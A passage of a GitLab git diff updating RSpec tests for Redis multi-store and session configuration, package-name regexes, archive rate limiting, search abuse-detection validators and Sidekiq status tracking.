expect(Gitlab::ErrorTracking).to receive(:log_exception).with(an_instance_of(Gitlab::Redis::MultiStore::MethodMissingError), + hash_including(command_name: :incr, extra: hash_including(instance_name: instance_name))) - subject + subject + end + + it 'increments method missing counter' do + expect(counter).to receive(:increment).with(command: :incr, instance_name: instance_name) + + subject + end end - it 'increments method missing counter' do - expect(multi_store).to receive(:increment_method_missing_count).with(:incr) + context 'when command is in SKIP_LOG_METHOD_MISSING_FOR_COMMANDS' do + subject { multi_store.info } - subject + it 'does not log MethodMissingError' do + expect(Gitlab::ErrorTracking).not_to receive(:log_exception) + + subject + end + + it 'does not increment method missing counter' do + expect(counter).not_to receive(:increment) + + subject + end end - it 'fallback and executes only on the secondary store', :aggregate_errors do - expect(secondary_store).to receive(:incr).with(key).and_call_original - expect(primary_store).not_to receive(:incr) + context 'with feature flag :use_primary_store_as_default_for_test_store is enabled' do + before do + stub_feature_flags(use_primary_store_as_default_for_test_store: true) + end + + it 'fallback and executes only on the secondary store', :aggregate_errors do + expect(primary_store).to receive(:incr).with(key).and_call_original + expect(secondary_store).not_to receive(:incr) - subject + subject + end + + it 'correct value is stored on the secondary store', :aggregate_errors do + subject + + expect(secondary_store.get(key)).to be_nil + expect(primary_store.get(key)).to eq('1') + end end - it 'correct value is stored on the secondary store', :aggregate_errors do - subject + context 'with feature flag :use_primary_store_as_default_for_test_store is disabled' do + before do + stub_feature_flags(use_primary_store_as_default_for_test_store: false) + end + + it 'fallback and executes only on the secondary store', 
:aggregate_errors do + expect(secondary_store).to receive(:incr).with(key).and_call_original + expect(primary_store).not_to receive(:incr) + + subject + end + + it 'correct value is stored on the secondary store', :aggregate_errors do + subject - expect(primary_store.get(key)).to be_nil - expect(secondary_store.get(key)).to eq('1') + expect(primary_store.get(key)).to be_nil + expect(secondary_store.get(key)).to eq('1') + end end context 'when the command is executed within pipelined block' do @@ -468,6 +580,96 @@ RSpec.describe Gitlab::Redis::MultiStore do end end + describe '#to_s' do + subject { multi_store.to_s } + + context 'with feature flag :use_primary_and_secondary_stores_for_test_store is enabled' do + before do + stub_feature_flags(use_primary_and_secondary_stores_for_test_store: true) + end + + it 'returns same value as primary_store' do + is_expected.to eq(primary_store.to_s) + end + end + + context 'with feature flag :use_primary_and_secondary_stores_for_test_store is disabled' do + before do + stub_feature_flags(use_primary_and_secondary_stores_for_test_store: false) + end + + context 'with feature flag :use_primary_store_as_default_for_test_store is enabled' do + before do + stub_feature_flags(use_primary_store_as_default_for_test_store: true) + end + + it 'returns same value as primary_store' do + is_expected.to eq(primary_store.to_s) + end + end + + context 'with feature flag :use_primary_store_as_default_for_test_store is disabled' do + before do + stub_feature_flags(use_primary_store_as_default_for_test_store: false) + end + + it 'returns same value as primary_store' do + is_expected.to eq(secondary_store.to_s) + end + end + end + end + + describe '#is_a?' do + it 'returns true for ::Redis::Store' do + expect(multi_store.is_a?(::Redis::Store)).to be true + end + end + + describe '#use_primary_and_secondary_stores?' 
do + context 'with feature flag :use_primary_and_secondary_stores_for_test_store is enabled' do + before do + stub_feature_flags(use_primary_and_secondary_stores_for_test_store: true) + end + + it 'multi store is disabled' do + expect(multi_store.use_primary_and_secondary_stores?).to be true + end + end + + context 'with feature flag :use_primary_and_secondary_stores_for_test_store is disabled' do + before do + stub_feature_flags(use_primary_and_secondary_stores_for_test_store: false) + end + + it 'multi store is disabled' do + expect(multi_store.use_primary_and_secondary_stores?).to be false + end + end + end + + describe '#use_primary_store_as_default?' do + context 'with feature flag :use_primary_store_as_default_for_test_store is enabled' do + before do + stub_feature_flags(use_primary_store_as_default_for_test_store: true) + end + + it 'multi store is disabled' do + expect(multi_store.use_primary_store_as_default?).to be true + end + end + + context 'with feature flag :use_primary_store_as_default_for_test_store is disabled' do + before do + stub_feature_flags(use_primary_store_as_default_for_test_store: false) + end + + it 'multi store is disabled' do + expect(multi_store.use_primary_store_as_default?).to be false + end + end + end + def create_redis_store(options, extras = {}) ::Redis::Store.new(options.merge(extras)) end diff --git a/spec/lib/gitlab/redis/sessions_spec.rb b/spec/lib/gitlab/redis/sessions_spec.rb index 7e239c08e9f..6ecbbf3294d 100644 --- a/spec/lib/gitlab/redis/sessions_spec.rb +++ b/spec/lib/gitlab/redis/sessions_spec.rb @@ -3,5 +3,90 @@ require 'spec_helper' RSpec.describe Gitlab::Redis::Sessions do - include_examples "redis_new_instance_shared_examples", 'sessions', Gitlab::Redis::SharedState + it_behaves_like "redis_new_instance_shared_examples", 'sessions', Gitlab::Redis::SharedState + + describe 'redis instance used in connection pool' do + before do + clear_pool + end + + after do + clear_pool + end + + context 'when redis.sessions 
configuration is not provided' do + it 'uses ::Redis instance' do + expect(described_class).to receive(:config_fallback?).and_return(true) + + described_class.pool.with do |redis_instance| + expect(redis_instance).to be_instance_of(::Redis) + end + end + end + + context 'when redis.sessions configuration is provided' do + it 'instantiates an instance of MultiStore' do + expect(described_class).to receive(:config_fallback?).and_return(false) + + described_class.pool.with do |redis_instance| + expect(redis_instance).to be_instance_of(::Gitlab::Redis::MultiStore) + end + end + end + + def clear_pool + described_class.remove_instance_variable(:@pool) + rescue NameError + # raised if @pool was not set; ignore + end + end + + describe '#store' do + subject(:store) { described_class.store(namespace: described_class::SESSION_NAMESPACE) } + + context 'when redis.sessions configuration is NOT provided' do + it 'instantiates ::Redis instance' do + expect(described_class).to receive(:config_fallback?).and_return(true) + expect(store).to be_instance_of(::Redis::Store) + end + end + + context 'when redis.sessions configuration is provided' do + let(:config_new_format_host) { "spec/fixtures/config/redis_new_format_host.yml" } + let(:config_new_format_socket) { "spec/fixtures/config/redis_new_format_socket.yml" } + + before do + redis_clear_raw_config!(Gitlab::Redis::Sessions) + redis_clear_raw_config!(Gitlab::Redis::SharedState) + allow(described_class).to receive(:config_fallback?).and_return(false) + end + + after do + redis_clear_raw_config!(Gitlab::Redis::Sessions) + redis_clear_raw_config!(Gitlab::Redis::SharedState) + end + + # Check that Gitlab::Redis::Sessions is configured as MultiStore with proper attrs. 
+ it 'instantiates an instance of MultiStore', :aggregate_failures do + expect(described_class).to receive(:config_file_name).and_return(config_new_format_host) + expect(::Gitlab::Redis::SharedState).to receive(:config_file_name).and_return(config_new_format_socket) + + expect(store).to be_instance_of(::Gitlab::Redis::MultiStore) + + expect(store.primary_store.to_s).to eq("Redis Client connected to test-host:6379 against DB 99 with namespace session:gitlab") + expect(store.secondary_store.to_s).to eq("Redis Client connected to /path/to/redis.sock against DB 0 with namespace session:gitlab") + + expect(store.instance_name).to eq('Sessions') + end + + context 'when MultiStore correctly configured' do + before do + allow(described_class).to receive(:config_file_name).and_return(config_new_format_host) + allow(::Gitlab::Redis::SharedState).to receive(:config_file_name).and_return(config_new_format_socket) + end + + it_behaves_like 'multi store feature flags', :use_primary_and_secondary_stores_for_sessions, :use_primary_store_as_default_for_sessions + end + end + end end diff --git a/spec/lib/gitlab/regex_spec.rb b/spec/lib/gitlab/regex_spec.rb index 05f1c88a6ab..83f85cc73d0 100644 --- a/spec/lib/gitlab/regex_spec.rb +++ b/spec/lib/gitlab/regex_spec.rb @@ -264,23 +264,37 @@ RSpec.describe Gitlab::Regex do it { is_expected.not_to match('1.2.3') } end - describe '.conan_recipe_component_regex' do - subject { described_class.conan_recipe_component_regex } - - let(:fifty_one_characters) { 'f_a' * 17} - - it { is_expected.to match('foobar') } - it { is_expected.to match('foo_bar') } - it { is_expected.to match('foo+bar') } - it { is_expected.to match('_foo+bar-baz+1.0') } - it { is_expected.to match('1.0.0') } - it { is_expected.not_to match('-foo_bar') } - it { is_expected.not_to match('+foo_bar') } - it { is_expected.not_to match('.foo_bar') } - it { is_expected.not_to match('foo@bar') } - it { is_expected.not_to match('foo/bar') } - it { is_expected.not_to match('!!()()') 
} - it { is_expected.not_to match(fifty_one_characters) } + context 'conan recipe components' do + shared_examples 'accepting valid recipe components values' do + let(:fifty_one_characters) { 'f_a' * 17} + + it { is_expected.to match('foobar') } + it { is_expected.to match('foo_bar') } + it { is_expected.to match('foo+bar') } + it { is_expected.to match('_foo+bar-baz+1.0') } + it { is_expected.to match('1.0.0') } + it { is_expected.not_to match('-foo_bar') } + it { is_expected.not_to match('+foo_bar') } + it { is_expected.not_to match('.foo_bar') } + it { is_expected.not_to match('foo@bar') } + it { is_expected.not_to match('foo/bar') } + it { is_expected.not_to match('!!()()') } + it { is_expected.not_to match(fifty_one_characters) } + end + + describe '.conan_recipe_component_regex' do + subject { described_class.conan_recipe_component_regex } + + it_behaves_like 'accepting valid recipe components values' + it { is_expected.not_to match('_') } + end + + describe '.conan_recipe_user_channel_regex' do + subject { described_class.conan_recipe_user_channel_regex } + + it_behaves_like 'accepting valid recipe components values' + it { is_expected.to match('_') } + end end describe '.package_name_regex' do diff --git a/spec/lib/gitlab/relative_positioning/range_spec.rb b/spec/lib/gitlab/relative_positioning/range_spec.rb index c3386336493..da1f0166d5d 100644 --- a/spec/lib/gitlab/relative_positioning/range_spec.rb +++ b/spec/lib/gitlab/relative_positioning/range_spec.rb @@ -3,8 +3,10 @@ require 'spec_helper' RSpec.describe Gitlab::RelativePositioning::Range do - item_a = OpenStruct.new(relative_position: 100, object: :x, positioned?: true) - item_b = OpenStruct.new(relative_position: 200, object: :y, positioned?: true) + position_struct = Struct.new(:relative_position, :object, :positioned?) 
+ + item_a = position_struct.new(100, :x, true) + item_b = position_struct.new(200, :y, true) before do allow(item_a).to receive(:lhs_neighbour) { nil } @@ -90,12 +92,12 @@ RSpec.describe Gitlab::RelativePositioning::Range do end describe '#cover?' do - item_c = OpenStruct.new(relative_position: 150, object: :z, positioned?: true) - item_d = OpenStruct.new(relative_position: 050, object: :w, positioned?: true) - item_e = OpenStruct.new(relative_position: 250, object: :r, positioned?: true) - item_f = OpenStruct.new(positioned?: false) - item_ax = OpenStruct.new(relative_position: 100, object: :not_x, positioned?: true) - item_bx = OpenStruct.new(relative_position: 200, object: :not_y, positioned?: true) + item_c = position_struct.new(150, :z, true) + item_d = position_struct.new(050, :w, true) + item_e = position_struct.new(250, :r, true) + item_f = position_struct.new(positioned?: false) + item_ax = position_struct.new(100, :not_x, true) + item_bx = position_struct.new(200, :not_y, true) where(:lhs, :rhs, :item, :expected_result) do [ diff --git a/spec/lib/gitlab/repository_archive_rate_limiter_spec.rb b/spec/lib/gitlab/repository_archive_rate_limiter_spec.rb new file mode 100644 index 00000000000..49df70f3cb3 --- /dev/null +++ b/spec/lib/gitlab/repository_archive_rate_limiter_spec.rb @@ -0,0 +1,56 @@ +# frozen_string_literal: true + +require 'spec_helper' + +RSpec.describe ::Gitlab::RepositoryArchiveRateLimiter do + let(:described_class) do + Class.new do + include ::Gitlab::RepositoryArchiveRateLimiter + + def check_rate_limit!(**args) + end + end + end + + describe "#check_archive_rate_limit!" 
do + let(:project) { instance_double('Project') } + let(:current_user) { instance_double('User') } + let(:check) { subject.check_archive_rate_limit!(current_user, project) } + + context 'when archive_rate_limit feature flag is disabled' do + before do + stub_feature_flags(archive_rate_limit: false) + end + + it 'does not check rate limit' do + expect(subject).not_to receive(:check_rate_limit!) + + expect(check).to eq nil + end + end + + context 'when archive_rate_limit feature flag is enabled' do + before do + stub_feature_flags(archive_rate_limit: true) + end + + context 'when current user exists' do + it 'checks for project_repositories_archive rate limiting with default threshold' do + expect(subject).to receive(:check_rate_limit!) + .with(:project_repositories_archive, scope: [project, current_user], threshold: nil) + check + end + end + + context 'when current user does not exist' do + let(:current_user) { nil } + + it 'checks for project_repositories_archive rate limiting with threshold 100' do + expect(subject).to receive(:check_rate_limit!) 
+ .with(:project_repositories_archive, scope: [project, current_user], threshold: 100) + check + end + end + end + end +end diff --git a/spec/lib/gitlab/saas_spec.rb b/spec/lib/gitlab/saas_spec.rb new file mode 100644 index 00000000000..1be36a60a97 --- /dev/null +++ b/spec/lib/gitlab/saas_spec.rb @@ -0,0 +1,13 @@ +# frozen_string_literal: true + +require 'spec_helper' + +RSpec.describe Gitlab::Saas do + describe '.canary_toggle_com_url' do + subject { described_class.canary_toggle_com_url } + + let(:next_url) { 'https://next.gitlab.com' } + + it { is_expected.to eq(next_url) } + end +end diff --git a/spec/lib/gitlab/search/abuse_detection_spec.rb b/spec/lib/gitlab/search/abuse_detection_spec.rb new file mode 100644 index 00000000000..a18d28456cd --- /dev/null +++ b/spec/lib/gitlab/search/abuse_detection_spec.rb @@ -0,0 +1,114 @@ +# frozen_string_literal: true + +require 'spec_helper' + +RSpec.describe Gitlab::Search::AbuseDetection do + subject { described_class.new(params) } + + let(:params) {{ query_string: 'foobar' }} + + describe 'abusive scopes validation' do + it 'allows only approved scopes' do + described_class::ALLOWED_SCOPES.each do |scope| + expect(described_class.new(scope: scope)).to be_valid + end + end + + it 'disallows anything not approved' do + expect(described_class.new(scope: 'nope')).not_to be_valid + end + end + + describe 'abusive character matching' do + refs = %w( + main + тест + maiñ + main123 + main-v123 + main-v12.3 + feature/it_works + really_important! 
+ 测试 + ) + + refs.each do |ref| + it "does match refs permitted by git refname: #{ref}" do + [:repository_ref, :project_ref].each do |param| + validation = described_class.new(Hash[param, ref]) + expect(validation).to be_valid + end + end + + it "does NOT match refs with special characters: #{ref}" do + ['?', '\\', ' '].each do |special_character| + [:repository_ref, :project_ref].each do |param| + validation = described_class.new(Hash[param, ref + special_character]) + expect(validation).not_to be_valid + end + end + end + end + end + + describe 'numericality validation' do + it 'considers non Integers to be invalid' do + [:project_id, :group_id].each do |param| + [[1, 2, 3], 'xyz', 3.14, { foo: :bar }].each do |dtype| + expect(described_class.new(param => dtype)).not_to be_valid + end + end + end + + it 'considers Integers to be valid' do + [:project_id, :group_id].each do |param| + expect(described_class.new(param => 123)).to be_valid + end + end + end + + describe 'query_string validation' do + using ::RSpec::Parameterized::TableSyntax + + subject { described_class.new(query_string: search) } + + let(:validation_errors) do + subject.validate + subject.errors.messages + end + + where(:search, :errors) do + described_class::STOP_WORDS.each do |word| + word | { query_string: ['stopword only abusive search detected'] } + end + + 'x' | { query_string: ['abusive tiny search detected'] } + ('x' * described_class::ABUSIVE_TERM_SIZE) | { query_string: ['abusive term length detected'] } + '' | {} + '*' | {} + 'ruby' | {} + end + + with_them do + it 'validates query string for pointless search' do + expect(validation_errors).to eq(errors) + end + end + end + + describe 'abusive type coercion from string validation' do + it 'considers anything not a String invalid' do + [:query_string, :scope, :repository_ref, :project_ref].each do |param| + [[1, 2, 3], 123, 3.14, { foo: :bar }].each do |dtype| + expect(described_class.new(param => dtype)).not_to be_valid + end + end + end 
+ + it 'considers Strings to be valid' do + [:query_string, :repository_ref, :project_ref].each do |param| + expect(described_class.new(param => "foo")).to be_valid + end + end + end +end diff --git a/spec/lib/gitlab/search/abuse_validators/no_abusive_coercion_from_string_validator_spec.rb b/spec/lib/gitlab/search/abuse_validators/no_abusive_coercion_from_string_validator_spec.rb new file mode 100644 index 00000000000..76280e65867 --- /dev/null +++ b/spec/lib/gitlab/search/abuse_validators/no_abusive_coercion_from_string_validator_spec.rb @@ -0,0 +1,35 @@ +# frozen_string_literal: true + +require 'spec_helper' + +RSpec.describe Gitlab::Search::AbuseValidators::NoAbusiveCoercionFromStringValidator do + subject do + described_class.new({ attributes: { foo: :bar } }) + end + + let(:instance) { double(:instance) } + let(:attribute) { :attribute } + let(:validation_msg) { 'abusive coercion from string detected' } + let(:validate) { subject.validate_each(instance, attribute, attribute_value) } + + using ::RSpec::Parameterized::TableSyntax + + where(:attribute_value, :valid?) do + ['this is an arry'] | false + { 'this': 'is a hash' } | false + 123 | false + 456.78 | false + 'now this is a string' | true + end + + with_them do + it do + if valid? 
+ expect(instance).not_to receive(:errors) + else + expect(instance).to receive_message_chain(:errors, :add).with(attribute, validation_msg) + validate + end + end + end +end diff --git a/spec/lib/gitlab/search/abuse_validators/no_abusive_term_length_validator_spec.rb b/spec/lib/gitlab/search/abuse_validators/no_abusive_term_length_validator_spec.rb new file mode 100644 index 00000000000..67409d9b628 --- /dev/null +++ b/spec/lib/gitlab/search/abuse_validators/no_abusive_term_length_validator_spec.rb @@ -0,0 +1,71 @@ +# frozen_string_literal: true + +require 'spec_helper' + +RSpec.describe Gitlab::Search::AbuseValidators::NoAbusiveTermLengthValidator do + subject do + described_class.new({ attributes: { foo: :bar }, maximum: limit, maximum_for_url: url_limit }) + end + + let(:limit) { 100 } + let(:url_limit) { limit * 2 } + let(:instance) { double(:instance) } + let(:attribute) { :search } + let(:validation_msg) { 'abusive term length detected' } + let(:validate) { subject.validate_each(instance, attribute, search) } + + context 'when a term is over the limit' do + let(:search) { "this search is too lo#{'n' * limit}g" } + + it 'adds a validation error' do + expect(instance).to receive_message_chain(:errors, :add).with(attribute, validation_msg) + validate + end + end + + context 'when all terms are under the limit' do + let(:search) { "what is love? 
baby don't hurt me" } + + it 'does NOT add any validation errors' do + expect(instance).not_to receive(:errors) + validate + end + end + + context 'when a URL is detected in a search term' do + let(:double_limit) { limit * 2 } + let(:terms) do + [ + 'http://' + 'x' * (double_limit - 12) + '.com', + 'https://' + 'x' * (double_limit - 13) + '.com', + 'sftp://' + 'x' * (double_limit - 12) + '.com', + 'ftp://' + 'x' * (double_limit - 11) + '.com', + 'http://' + 'x' * (double_limit - 8) # no tld is OK + ] + end + + context 'when under twice the limit' do + let(:search) { terms.join(' ') } + + it 'does NOT add any validation errors' do + search.split.each do |term| + expect(term.length).to be < url_limit + end + + expect(instance).not_to receive(:errors) + validate + end + end + + context 'when over twice the limit' do + let(:search) do + terms.map { |t| t + 'xxxxxxxx' }.join(' ') + end + + it 'adds a validation error' do + expect(instance).to receive_message_chain(:errors, :add).with(attribute, validation_msg) + validate + end + end + end +end diff --git a/spec/lib/gitlab/search/params_spec.rb b/spec/lib/gitlab/search/params_spec.rb new file mode 100644 index 00000000000..6d15337b872 --- /dev/null +++ b/spec/lib/gitlab/search/params_spec.rb @@ -0,0 +1,136 @@ +# frozen_string_literal: true + +require 'spec_helper' + +RSpec.describe Gitlab::Search::Params do + subject { described_class.new(params, detect_abuse: detect_abuse) } + + let(:search) { 'search' } + let(:group_id) { 123 } + let(:params) { { group_id: 123, search: search } } + let(:detect_abuse) { true } + + describe 'detect_abuse conditional' do + it 'does not call AbuseDetection' do + expect(Gitlab::Search::AbuseDetection).not_to receive(:new) + described_class.new(params, detect_abuse: false) + end + + it 'uses AbuseDetection by default' do + expect(Gitlab::Search::AbuseDetection).to receive(:new).and_call_original + described_class.new(params) + end + end + + describe '#[]' do + it 'feels like regular params' 
do + expect(subject[:group_id]).to eq(params[:group_id]) + end + + it 'has indifferent access' do + params = described_class.new({ 'search' => search, group_id: group_id }) + expect(params['group_id']).to eq(group_id) + expect(params[:search]).to eq(search) + end + + it 'also works on attr_reader attributes' do + expect(subject[:query_string]).to eq(subject.query_string) + end + end + + describe '#query_string' do + let(:term) { 'term' } + + it "uses 'search' parameter" do + params = described_class.new({ search: search }) + expect(params.query_string).to eq(search) + end + + it "uses 'term' parameter" do + params = described_class.new({ term: term }) + expect(params.query_string).to eq(term) + end + + it "prioritizes 'search' over 'term'" do + params = described_class.new({ search: search, term: term }) + expect(params.query_string).to eq(search) + end + + it 'strips surrounding whitespace from query string' do + params = described_class.new({ search: ' ' + search + ' ' }) + expect(params.query_string).to eq(search) + end + end + + describe '#validate' do + context 'when detect_abuse is disabled' do + let(:detect_abuse) { false } + + it 'does NOT validate AbuseDetector' do + expect(Gitlab::Search::AbuseDetection).not_to receive(:new) + subject.validate + end + end + + it 'validates AbuseDetector on validation' do + expect(Gitlab::Search::AbuseDetection).to receive(:new).and_call_original + subject.validate + end + end + + describe '#valid?' do + context 'when detect_abuse is disabled' do + let(:detect_abuse) { false } + + it 'does NOT validate AbuseDetector' do + expect(Gitlab::Search::AbuseDetection).not_to receive(:new) + subject.valid? + end + end + + it 'validates AbuseDetector on validation' do + expect(Gitlab::Search::AbuseDetection).to receive(:new).and_call_original + subject.valid? 
+ end + end + + describe 'abuse detection' do + let(:abuse_detection) { instance_double(Gitlab::Search::AbuseDetection) } + + before do + allow(subject).to receive(:abuse_detection).and_return abuse_detection + allow(abuse_detection).to receive(:errors).and_return abuse_errors + end + + context 'when there are abuse validation errors' do + let(:abuse_errors) { { foo: ['bar'] } } + + it 'is considered abusive' do + expect(subject).to be_abusive + end + end + + context 'when there are NOT any abuse validation errors' do + let(:abuse_errors) { {} } + + context 'and there are other validation errors' do + it 'is NOT considered abusive' do + allow(subject).to receive(:valid?) do + subject.errors.add :project_id, 'validation error unrelated to abuse' + false + end + + expect(subject).not_to be_abusive + end + end + + context 'and there are NO other validation errors' do + it 'is NOT considered abusive' do + allow(subject).to receive(:valid?).and_return(true) + + expect(subject).not_to be_abusive + end + end + end + end +end diff --git a/spec/lib/gitlab/security/scan_configuration_spec.rb b/spec/lib/gitlab/security/scan_configuration_spec.rb new file mode 100644 index 00000000000..0af029968e8 --- /dev/null +++ b/spec/lib/gitlab/security/scan_configuration_spec.rb @@ -0,0 +1,64 @@ +# frozen_string_literal: true + +require 'spec_helper' + +RSpec.describe ::Gitlab::Security::ScanConfiguration do + let_it_be(:project) { create(:project, :repository) } + + let(:scan) { described_class.new(project: project, type: type, configured: configured) } + + describe '#available?' do + subject { scan.available? } + + let(:configured) { true } + + context 'with a core scanner' do + let(:type) { :sast } + + it { is_expected.to be_truthy } + end + + context 'with custom scanner' do + let(:type) { :my_scanner } + + it { is_expected.to be_falsey } + end + end + + describe '#configured?' do + subject { scan.configured? 
} + + let(:type) { :sast } + let(:configured) { false } + + it { is_expected.to be_falsey } + end + + describe '#configuration_path' do + subject { scan.configuration_path } + + let(:configured) { true } + + context 'with a non configurable scanner' do + let(:type) { :secret_detection } + + it { is_expected.to be_nil } + end + + context 'with licensed scanner for FOSS environment' do + let(:type) { :dast } + + before do + stub_env('FOSS_ONLY', '1') + end + + it { is_expected.to be_nil } + end + + context 'with custom scanner' do + let(:type) { :my_scanner } + + it { is_expected.to be_nil } + end + end +end diff --git a/spec/lib/gitlab/sidekiq_enq_spec.rb b/spec/lib/gitlab/sidekiq_enq_spec.rb deleted file mode 100644 index 6903f01bf5f..00000000000 --- a/spec/lib/gitlab/sidekiq_enq_spec.rb +++ /dev/null @@ -1,93 +0,0 @@ -# frozen_string_literal: true - -require 'spec_helper' - -RSpec.describe Gitlab::SidekiqEnq, :clean_gitlab_redis_queues do - let(:retry_set) { Sidekiq::Scheduled::SETS.first } - let(:schedule_set) { Sidekiq::Scheduled::SETS.last } - - around do |example| - freeze_time { example.run } - end - - shared_examples 'finds jobs that are due and enqueues them' do - before do - Sidekiq.redis do |redis| - redis.zadd(retry_set, (Time.current - 1.day).to_f.to_s, '{"jid": 1}') - redis.zadd(retry_set, Time.current.to_f.to_s, '{"jid": 2}') - redis.zadd(retry_set, (Time.current + 1.day).to_f.to_s, '{"jid": 3}') - - redis.zadd(schedule_set, (Time.current - 1.day).to_f.to_s, '{"jid": 4}') - redis.zadd(schedule_set, Time.current.to_f.to_s, '{"jid": 5}') - redis.zadd(schedule_set, (Time.current + 1.day).to_f.to_s, '{"jid": 6}') - end - end - - it 'enqueues jobs that are due' do - expect(Sidekiq::Client).to receive(:push).with({ 'jid' => 1 }) - expect(Sidekiq::Client).to receive(:push).with({ 'jid' => 2 }) - expect(Sidekiq::Client).to receive(:push).with({ 'jid' => 4 }) - expect(Sidekiq::Client).to receive(:push).with({ 'jid' => 5 }) - - 
Gitlab::SidekiqEnq.new.enqueue_jobs - - Sidekiq.redis do |redis| - expect(redis.zscan_each(retry_set).map(&:first)).to contain_exactly('{"jid": 3}') - expect(redis.zscan_each(schedule_set).map(&:first)).to contain_exactly('{"jid": 6}') - end - end - end - - context 'when atomic_sidekiq_scheduler is disabled' do - before do - stub_feature_flags(atomic_sidekiq_scheduler: false) - end - - it_behaves_like 'finds jobs that are due and enqueues them' - - context 'when ZRANGEBYSCORE returns a job that is already removed by another process' do - before do - Sidekiq.redis do |redis| - redis.zadd(schedule_set, Time.current.to_f.to_s, '{"jid": 1}') - - allow(redis).to receive(:zrangebyscore).and_wrap_original do |m, *args, **kwargs| - m.call(*args, **kwargs).tap do |jobs| - redis.zrem(schedule_set, jobs.first) if args[0] == schedule_set && jobs.first - end - end - end - end - - it 'calls ZREM but does not enqueue the job' do - Sidekiq.redis do |redis| - expect(redis).to receive(:zrem).with(schedule_set, '{"jid": 1}').twice.and_call_original - end - expect(Sidekiq::Client).not_to receive(:push) - - Gitlab::SidekiqEnq.new.enqueue_jobs - end - end - end - - context 'when atomic_sidekiq_scheduler is enabled' do - before do - stub_feature_flags(atomic_sidekiq_scheduler: true) - end - - context 'when Lua script is not yet loaded' do - before do - Gitlab::Redis::Queues.with { |redis| redis.script(:flush) } - end - - it_behaves_like 'finds jobs that are due and enqueues them' - end - - context 'when Lua script is already loaded' do - before do - Gitlab::SidekiqEnq.new.enqueue_jobs - end - - it_behaves_like 'finds jobs that are due and enqueues them' - end - end -end diff --git a/spec/lib/gitlab/sidekiq_logging/structured_logger_spec.rb b/spec/lib/gitlab/sidekiq_logging/structured_logger_spec.rb index d801b84775b..210b9162be0 100644 --- a/spec/lib/gitlab/sidekiq_logging/structured_logger_spec.rb +++ b/spec/lib/gitlab/sidekiq_logging/structured_logger_spec.rb @@ -272,12 +272,12 @@ 
RSpec.describe Gitlab::SidekiqLogging::StructuredLogger do expected_end_payload.merge( 'db_duration_s' => a_value >= 0.1, 'db_count' => a_value >= 1, - "db_replica_#{db_config_name}_count" => 0, + "db_#{db_config_name}_replica_count" => 0, 'db_replica_duration_s' => a_value >= 0, 'db_primary_count' => a_value >= 1, - "db_primary_#{db_config_name}_count" => a_value >= 1, + "db_#{db_config_name}_count" => a_value >= 1, 'db_primary_duration_s' => a_value > 0, - "db_primary_#{db_config_name}_duration_s" => a_value > 0 + "db_#{db_config_name}_duration_s" => a_value > 0 ) end diff --git a/spec/lib/gitlab/sidekiq_middleware/server_metrics_spec.rb b/spec/lib/gitlab/sidekiq_middleware/server_metrics_spec.rb index 914f5a30c3a..3fbd207c2e1 100644 --- a/spec/lib/gitlab/sidekiq_middleware/server_metrics_spec.rb +++ b/spec/lib/gitlab/sidekiq_middleware/server_metrics_spec.rb @@ -239,6 +239,8 @@ RSpec.describe Gitlab::SidekiqMiddleware::ServerMetrics do shared_context 'worker declaring data consistency' do let(:worker_class) { LBTestWorker } + let(:wal_locations) { { Gitlab::Database::MAIN_DATABASE_NAME.to_sym => 'AB/12345' } } + let(:job) { { "retry" => 3, "job_id" => "a180b47c-3fd6-41b8-81e9-34da61c3400e", "wal_locations" => wal_locations } } before do stub_const('LBTestWorker', Class.new(TestWorker)) diff --git a/spec/lib/gitlab/sidekiq_status/client_middleware_spec.rb b/spec/lib/gitlab/sidekiq_status/client_middleware_spec.rb index 0cf05fb0a5c..2f2499753b9 100644 --- a/spec/lib/gitlab/sidekiq_status/client_middleware_spec.rb +++ b/spec/lib/gitlab/sidekiq_status/client_middleware_spec.rb @@ -1,14 +1,25 @@ # frozen_string_literal: true -require 'spec_helper' +require 'fast_spec_helper' RSpec.describe Gitlab::SidekiqStatus::ClientMiddleware do describe '#call' do - it 'tracks the job in Redis' do - expect(Gitlab::SidekiqStatus).to receive(:set).with('123', Gitlab::SidekiqStatus::DEFAULT_EXPIRATION) + context 'when the job has status_expiration set' do + it 'tracks the job in 
Redis with a value of 2' do + expect(Gitlab::SidekiqStatus).to receive(:set).with('123', 1.hour.to_i, value: 2) - described_class.new - .call('Foo', { 'jid' => '123' }, double(:queue), double(:pool)) { nil } + described_class.new + .call('Foo', { 'jid' => '123', 'status_expiration' => 1.hour.to_i }, double(:queue), double(:pool)) { nil } + end + end + + context 'when the job does not have status_expiration set' do + it 'tracks the job in Redis with a value of 1' do + expect(Gitlab::SidekiqStatus).to receive(:set).with('123', Gitlab::SidekiqStatus::DEFAULT_EXPIRATION, value: 1) + + described_class.new + .call('Foo', { 'jid' => '123' }, double(:queue), double(:pool)) { nil } + end end end end diff --git a/spec/lib/gitlab/sidekiq_status_spec.rb b/spec/lib/gitlab/sidekiq_status_spec.rb index fc2ac29a1f9..1e7b52471b0 100644 --- a/spec/lib/gitlab/sidekiq_status_spec.rb +++ b/spec/lib/gitlab/sidekiq_status_spec.rb @@ -12,6 +12,31 @@ RSpec.describe Gitlab::SidekiqStatus, :clean_gitlab_redis_queues, :clean_gitlab_ Sidekiq.redis do |redis| expect(redis.exists(key)).to eq(true) expect(redis.ttl(key) > 0).to eq(true) + expect(redis.get(key)).to eq(described_class::DEFAULT_VALUE.to_s) + end + end + + it 'allows overriding the expiration time' do + described_class.set('123', described_class::DEFAULT_EXPIRATION * 2) + + key = described_class.key_for('123') + + Sidekiq.redis do |redis| + expect(redis.exists(key)).to eq(true) + expect(redis.ttl(key) > described_class::DEFAULT_EXPIRATION).to eq(true) + expect(redis.get(key)).to eq(described_class::DEFAULT_VALUE.to_s) + end + end + + it 'allows overriding the default value' do + described_class.set('123', value: 2) + + key = described_class.key_for('123') + + Sidekiq.redis do |redis| + expect(redis.exists(key)).to eq(true) + expect(redis.ttl(key) > 0).to eq(true) + expect(redis.get(key)).to eq('2') end end end @@ -88,7 +113,7 @@ RSpec.describe Gitlab::SidekiqStatus, :clean_gitlab_redis_queues, :clean_gitlab_ end end - describe 
